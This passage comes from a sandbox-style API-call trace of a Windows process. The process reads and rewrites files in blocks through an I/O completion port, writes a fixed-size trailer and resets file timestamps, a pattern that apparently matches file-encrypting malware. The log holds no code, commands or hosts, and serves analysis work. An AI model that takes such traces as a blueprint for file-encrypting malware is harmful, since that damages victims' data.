_Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.299] free (_Block=0x2060778) [0077.299] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.299] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.299] free (_Block=0x2062da0) [0077.299] free (_Block=0x53fcc0) [0077.300] free (_Block=0x2062eb8) [0077.300] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.300] GetLastError () returned 0x3e5 [0077.300] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.337] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.337] CloseHandle (hObject=0x3b4) returned 1 [0077.339] free (_Block=0x3940048) [0077.339] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.581] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.581] CloseHandle (hObject=0x3b0) returned 1 [0077.588] free (_Block=0x206b860) [0077.588] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.876] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0077.879] GetLastError () returned 0x3e5 [0077.879] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.078] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x30200, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.145] GetLastError () returned 0x3e5 [0078.145] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.163] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.164] CloseHandle (hObject=0x3bc) returned 1 [0078.168] free (_Block=0x206b860) [0078.169] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.174] ReadFile (in: hFile=0x3b4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x36c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0078.191] GetLastError () returned 0x3e5 [0078.191] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.200] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.200] CloseHandle (hObject=0x3b4) returned 1 [0078.204] free (_Block=0x3940048) [0078.204] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.227] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.236] GetLastError () returned 0x3e5 [0078.236] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.255] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.255] CloseHandle (hObject=0x3bc) returned 1 [0078.259] free (_Block=0x206b860) [0078.259] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.263] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.263] CloseHandle (hObject=0x3b0) returned 1 [0078.267] free (_Block=0x3940048) [0078.267] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.272] ReadFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0078.285] GetLastError () returned 0x3e5 [0078.285] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.286] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.286] CloseHandle (hObject=0x3b4) returned 1 [0078.289] free (_Block=0x20abae0) [0078.289] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.418] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.418] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.418] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.419] free (_Block=0x2060778) [0078.419] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.419] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.419] free (_Block=0x2062da0) [0078.420] free (_Block=0x53fcc0) [0078.420] free (_Block=0x2062eb8) [0078.420] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.422] GetLastError () returned 0x3e5 [0078.422] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.422] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.422] GetLastError () returned 0x3e5 [0078.422] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.759] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.767] GetLastError () returned 0x3e5 [0078.767] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.785] ReadFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0078.785] GetLastError () returned 0x3e5 [0078.785] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.796] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0078.796] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0078.796] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0078.796] free (_Block=0x2060778) [0078.796] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0078.796] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0078.797] free (_Block=0x2062da0) [0078.797] free (_Block=0x53fcc0) [0078.797] free (_Block=0x2062eb8) [0078.797] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0078.797] GetLastError () returned 0x3e5 [0078.797] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0078.830] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x36400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0078.830] GetLastError () returned 0x3e5 [0078.831] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.211] ReadFile (in: hFile=0x3bc, lpBuffer=0x20abb14, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 0x0 [0079.211] GetLastError () returned 0x3e5 [0079.211] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.219] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.219] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.219] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.219] free (_Block=0x2060778) [0079.219] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.220] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.220] free (_Block=0x2062da0) [0079.221] free (_Block=0x53fcc0) [0079.221] free (_Block=0x2062eb8) [0079.221] WriteFile (in: hFile=0x3b4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.222] GetLastError () returned 0x3e5 [0079.222] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.263] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.264] CloseHandle (hObject=0x3b4) returned 1 [0079.268] free (_Block=0x3940048) [0079.268] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.270] WriteFile (in: hFile=0x3b0, lpBuffer=0x20ebb84*, nNumberOfBytesToWrite=0xaa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0079.270] GetLastError () returned 0x3e5 [0079.270] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.426] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.427] GetLastError () returned 0x3e5 [0079.427] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.479] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.479] CloseHandle (hObject=0x3bc) returned 1 [0079.484] free (_Block=0x206b860) [0079.484] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.497] WriteFile (in: hFile=0x3c0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.497] GetLastError () returned 0x3e5 [0079.497] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.508] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.508] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.508] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.509] free (_Block=0x2060778) [0079.509] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.509] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.510] free (_Block=0x2062da0) [0079.510] free (_Block=0x53fcc0) [0079.510] free (_Block=0x2062eb8) [0079.510] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.511] GetLastError () returned 0x3e5 [0079.511] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.524] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0079.525] GetLastError () returned 0x3e5 [0079.525] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.535] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.536] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.536] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.536] free (_Block=0x2060778) [0079.536] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.536] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.537] free (_Block=0x2062da0) [0079.537] free (_Block=0x53fcc0) [0079.538] free (_Block=0x2062eb8) [0079.538] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.538] GetLastError () returned 0x3e5 [0079.539] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.570] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.571] GetLastError () returned 0x3e5 [0079.571] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.737] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.737] GetLastError () returned 0x3e5 [0079.737] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.754] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0079.754] GetLastError () returned 0x3e5 [0079.754] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.772] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.772] CloseHandle (hObject=0x3c0) returned 1 [0079.774] free (_Block=0x206b860) [0079.775] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.803] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.803] CloseHandle (hObject=0x3bc) returned 1 [0079.805] free (_Block=0x3940048) [0079.805] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.837] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.837] CloseHandle (hObject=0x3b0) returned 1 [0079.839] free (_Block=0x3940048) [0079.839] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.851] WriteFile (in: hFile=0x3bc, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0079.851] GetLastError () returned 0x3e5 [0079.851] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.978] ReadFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.982] GetLastError () returned 0x3e5 [0079.982] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0079.984] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.984] CloseHandle (hObject=0x3b8) returned 1 [0080.150] free (_Block=0x206b860) [0080.151] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0080.171] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.171] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.171] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.172] free (_Block=0x2060778) [0080.172] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.172] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.173] free (_Block=0x2062da0) [0080.173] free (_Block=0x53fcc0) [0080.173] free (_Block=0x2062eb8) [0080.173] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.174] GetLastError () returned 0x3e5 [0080.174] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0080.242] ReadFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x59a, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 